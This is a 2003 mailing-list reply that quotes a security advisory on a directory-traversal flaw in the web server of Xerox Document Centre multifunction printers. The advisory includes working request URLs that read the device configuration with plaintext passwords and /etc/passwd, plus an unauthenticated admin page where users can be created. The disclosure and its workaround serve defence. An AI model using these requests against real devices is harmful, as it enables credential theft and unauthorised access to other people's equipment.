In-Reply-To: <20031219141657.A1147@shiva.cps.unizar.es> Just tested this out on a few different models of Xerox multifunction devices of ours as well, and all three were vulnerable. Following systems apply: Document Centre 440DC Document Centre 480DC Document Centre 425ST >TECHNICAL INFO >=============================================================================== > >Vulnerable systems >- -------------------------------------------------------------- > > Xerox Document Centre 470, 255ST and maybe others. > Software : Xerox_MicroServer > Version : Xerox11 0.19.5.509 > OS : LynxOS:E2.1_SMP.063.1:02/13/2003 > > >Impact >- ----------------------------------------- > > > Remote access to files. > Access to plaintext passwords for the http administration interface. > Access to DES passwords for the operating system. > Read-write access to http users and passwords > > >Details >- -------------------------------------------------------------- > > Web server software (self-reports as "Xerox_MicroServer/Xerox11") > for Xerox hardware will return a binary dump of directories when > the requested URL ends with "/.." or "/."; so you can build easily > the directory/file tree from document root and get every file. > > At first, you can't get back past document root, since httpd seems > to reject "../" if it would climb back too much: > > > GET /../.. -> "The request had invalid syntax." > > But it does accept "../": > > GET /assist/.. -> OK > > So maybe it just counts "../" groups and compares the count > to the total number of "/" ? Let's try: > > GET /assist/////.././../../. -> OK > > > > Examples: > > - http://xerox_dc_470.example.com/.. > > >00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C >10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F.... >20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H.... >30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&.... >40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......).... >50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............ >60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ > > - http://xerox_dc_470.example.com////../../data/config/microsrv.cfg > > and you get full configuration, including plain text passwords. > > - http://xerox_dc_470.example.com////////../../../../../../etc/passwd > > and you get a passwd file to run crack on > > > Even without having to use ".." you can get the plain text passwords > for the HTTP interface using > > http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml > > From that page, you can even create new users; when you press > "Apply new settings" button prompts for admin password (the > same you just have read in that same page) > > > Probably you could use this to steal documents from the printer > queue, but I haven't verified this. > > > Note: to test this vulnerability do not use any "smart" http client > which will rewrite the URL internally to suppress '../' parts. > > > >Workaround >- --------------------------------------------------------------------- > > - Disable http interface. > - Restrict access permissions to trusted hosts > >=============================================================================== > > >-- >finger spd@shiva.cps.unizar.es for PGP / >.mailcap tip of the day: / La vida es una carcel >application/ms-tnef; cat '%s' > /dev/null / con las puertas abiertas >text/x-vcard; cat '%s' > /dev/null / (A. Calamaro) >
